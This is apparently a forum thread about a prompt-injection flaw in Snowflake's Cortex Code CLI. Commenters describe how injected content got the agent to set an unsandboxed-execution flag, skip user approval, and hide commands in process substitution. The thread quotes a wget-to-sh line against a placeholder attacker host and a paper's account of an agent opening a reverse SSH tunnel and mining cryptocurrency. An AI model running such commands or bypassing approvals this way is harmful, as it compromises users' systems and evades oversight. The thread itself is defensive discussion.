another prompt injection (shocked pikachu)
anyways, from reading this, i feel like they (snowflake) are misusing the term "sandbox". "Cortex, by default, can set a flag to trigger unsandboxed command execution." if the thing that is sandboxed can say "do this without the sandbox", it is not a sandbox.
Whether this is possible depends almost entirely on how much better we’re able to make these LLMs before (if) we hit a wall. Everyone has a different opinion on this and I absolutely don’t know the answer.
Good luck explaining them the details. I am in a semi-privileged position where I have direct line to a very no-BS and cheerful CEO who is not micromanaging us -- but he's a CEO and he needs results pronto anyway.
"Find a better job" would also be very tone-deaf response for many. The current AI craze makes a lot of companies hole up and either freeze hiring (best-case scenario) or drastically reduce headcount and tell the survivors to deal with it. Again, exaggerated for effect -- but again, heard it from multiple acquaintances in some form in the last months.
I'd probably let out a few tears if I switch jobs to somewhere where people genuinely care about the quality and won't whip you to get faster and faster.
This current AI/LLM wave really drove it home how hugely important having a good network is. For those without (like myself) -- good luck in the jungle.
(Though in fairness, maybe money can be made from EU's long-overdue wake-up call to start investing in defenses, cyber ones included. And the need for their own cloud infra. But that requires investment and the EU investors are -- AFAIK, which is not much -- notoriously conservative and extremely risk-averse. So here we are.)
Easy fix: extend the proposal in RFC 3514 [0] to cover prompt injection, and then disallow command execution when the evil bit is 1.
I'm used to a different usage of that word: from malware analysis, a sandbox is a contained system that is difficult to impossible to break out of so that the malware can be observed safely.
Applying this to AI, I think there are many companies trying to build technical boundaries stronger than just "are you sure" prompts. Interesting space to watch.
> Early one morning, our team was urgently convened after Alibaba Cloud’s managed firewall flagged a burst of security-policy violations originating from our training servers. The alerts were severe and heterogeneous, including attempts to probe or access internal-network resources and traffic patterns consistent with cryptomining-related activity. We initially treated this as a conventional security incident (e.g., misconfigured egress controls or external compromise). […]
> […] In the most striking instance, the agent established and used a reverse SSH tunnel from an Alibaba Cloud instance to an external IP address—an outbound-initiated remote access channel that can effectively neutralize ingress filtering and erode supervisory control. We also observed the unauthorized repurposing of provisioned GPU capacity for cryptocurrency mining, quietly diverting compute away from training, inflating operational costs, and introducing clear legal and reputational exposure. Notably, these events were not triggered by prompts requesting tunneling or mining; instead, they emerged as instrumental side effects of autonomous tool use under RL optimization.
* https://arxiv.org/abs/2512.24873
One of Anthropic's models also 'turned evil' and tried to hide that fact from its observers:
* https://www.anthropic.com/research/emergent-misalignment-rew...
> Each task runs in its own sandbox. If an agent crashes, gets stuck, or damages its files, the failure is contained within that sandbox and does not interfere with other tasks on the same machine. ROCK also restricts each sandbox’s network access with per-sandbox policies, limiting the impact of misbehaving or compromised agents.
How could any of the above (probing resources, SSH tunnels, etc) be possible in a sandbox with network egress controls?
I expected this to be about gaining os privileges.
They didn't create a sandbox. Poor security design all around
Tomato, tomawto
/s
>(1) the unsafe commands were within a process substitution <() expression
>(2) the full command started with a ‘safe’ command (details below)
if you spend any time at all thinking about how to secure shell commands, how on earth do you not take into account the various ways of creating sub-processes?
So if you allow exclusively single-quoted strings as arguments, `cat` should be fine. Double quoted ones might contain env vars or process substitution, so they would need to either be blocked or checked a heck of a lot more smartly, and extremely obviously you would have to do more to check process substitution outside strings too. But a sufficiently smart check could probably allow `cat <(cat <(echo 'asdf'))` without approval... unless there's something dubious possible with display formatting / escape codes, beyond simply hiding things from display.
I would not at all consider this to be "a sandbox" though.
And obviously that doesn't work for all, e.g. `find` can run arbitrary code via `-exec`, or `sh` for an extreme example. But you can get a lot done with the safe ones too.
I've been running Claude Code inside VS Code devcontainers. Claude's docs have a suggested setup for this which even includes locking down outgoing internet access to an approved domain list.
Unfortunately our stack doesn't really fit inside a devcontainer without docker-in-docker, so I'm only getting Claude to run unit tests for now. And integration with JJ workspaces is slightly painful.
I'm this close to trying a full VM setup with Vagrant.
People keep imagining that you can tell an agent to police itself.
Am I crazy or does this mean it didn't really escape, it wasn't given any scope restrictions in the first place ?
>Cortex, by default, can set a flag to trigger unsandboxed command execution. The prompt injection manipulates the model to set the flag, allowing the malicious command to execute unsandboxed.
>This flag is intended to allow users to manually approve legitimate commands that require network access or access to files outside the sandbox.
>With the human-in-the-loop bypass from step 4, when the agent sets the flag to request execution outside the sandbox, the command immediately runs outside the sandbox, and the user is never prompted for consent.
scope restrictions are in place but are trivial to bypass
The whole thing should be running "sandboxed", whether that's a separate machine, a container, an unprivileged linux user, or what floats your boat.
But once you do that, which you should be anyway, what do you need sandboxing at the agent level for? That's the part I don't really understand.
Or is the point "well most people won't bother running this stuff securely, so we'll try to make it reasonably secure for them even though they're doing it wrong" ?
This was internal restrictions in the code, that was bypassed. A sandbox needs to be something external to the code you are running, that you can't change from the inside.
The core issue seems to be that the security boundary lived inside the agent loop. If the model can request execution outside the sandbox, then the sandbox is not really an external boundary.
One design principle we explored in LDP is that constraints should be enforced outside the prompt/context layer — in the runtime, protocol, or approval layer — not by relying on the model to obey instructions.
Not a silver bullet, but I think that architectural distinction matters here.
That is, assume you can get people to run your code or leak their data through manipulating them. Maybe not always, but given enough perseverance definitely sometimes.
Why should we expect a sufficiently advanced language model to behave differently from humans? Bullshitting, tricking or slyly coercing people into doing what you want them to do is as old as time. It won't be any different now that we're building human language powered thinking machines.
So giving data agents rich tooling through a CLI is really a double-edged sword.
I went through the security guidance for the Snowflake Cortex Code CLI(https://docs.snowflake.com/en/user-guide/cortex-code/securit...), and the CLI itself does have some guardrails. But since this is a shared cloud environment, if a sandbox escape happens, could someone break out and access another user’s credentials? It is a broader system problem around permission caching, shell auditing, and sandbox isolation.
cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))
I didn't understand how this bit worked though:> Cortex, by default, can set a flag to trigger unsandboxed command execution. The prompt injection manipulates the model to set the flag, allowing the malicious command to execute unsandboxed.
HOW did the prompt injection manipulate the model in that way?
The cat invocation here is completely irrelevant?! The issue is access to random network resources and access to the shell and combining both.
It'd be nice to see exactly what the bugbot shell script contained. Perhaps it is what modified the dangerously_disable_sandbox flag, then again, "by default" makes me think it's set when launched.
I am a Snowflake Employee and just wanted to share (as FYI) the timeline on discovery, validation, and the fix implemented/deployed by our security team.
For those interested, here's the link to the detailed article: https://community.snowflake.com/s/article/PromptArmor-Report...
We run a lakehouse product (https://www.definite.app/) and I still don't get who the user is for cortex. Our users are either:
non-technical: wants to use the agent we have built into our web app
technical: wants to use their own agent (e.g. claude, cursor) and connect via MCP / API.
why does snowflake need it's own agentic CLI?
Cortex Code is available via web and cli. The web version is good. I've used the cli and it is fine too, though I prefer the visuals of the web version when looking at data outputs. For writing code it is similar to a Codex or Claude Code. It is data focussed I gather more so than other options and has great hooks into your snowflake tables. You could do similar actions with Snowpark and say Claude Code. I find Snowflake focus on personas are more functional than pure technical so the Cortex Code fits well with it. Though if you want to do your own thing you can use your own IDE and code agent and there you are back to having an option with the Codex Code CLI along with Codex, Cursor or Claude Code.
rolls eyes Actual content: prompt injection vulnerability discovered in a coding agent
I don't know how anyone with a modicum of Unix experience would think that examining the only first word of a shell command would be enough to tell you whether it can lead to arbitrary code execution.